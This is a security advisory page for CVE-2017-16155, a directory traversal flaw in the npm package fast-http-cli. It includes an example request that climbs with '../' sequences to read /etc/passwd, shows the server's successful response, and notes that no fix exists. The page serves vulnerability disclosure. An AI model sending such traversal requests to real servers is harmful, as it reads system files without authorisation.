Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTlmcnEtZjg2Ny1oZ3Fj
Directory Traversal in fast-http-cli
fast-http-cli
is the command line interface for fast-http
, a simple web server.
fast-http-cli
is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing "../" in the url.
Example request:
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host: localhost
and server Response:
HTTP/1.1 200 OK
Date: Thu, 04 May 2017 23:59:18 GMT
Connection: keep-alive
Transfer-Encoding: chunked
{contents of /etc/passwd}
Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
Permalink: https://github.com/advisories/GHSA-9frq-f867-hgqcJSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTlmcnEtZjg2Ny1oZ3Fj
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: over 6 years ago
Updated: over 1 year ago
CVSS Score: 7.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS Percentage: 0.00651
EPSS Percentile: 0.79293
Identifiers: GHSA-9frq-f867-hgqc, CVE-2017-16155
References:
- https://nvd.nist.gov/vuln/detail/CVE-2017-16155
- https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/fast-http-cli
- https://github.com/advisories/GHSA-9frq-f867-hgqc
- https://www.npmjs.com/advisories/383
Affected Packages
npm:fast-http-cli
Dependent packages: 1Dependent repositories: 1
Downloads: 14 last month
Affected Version Ranges: <= 0.0.8
No known fixed version
All affected versions: 0.0.1, 0.0.2, 0.0.3, 0.0.4, 0.0.5, 0.0.6, 0.0.7, 0.0.8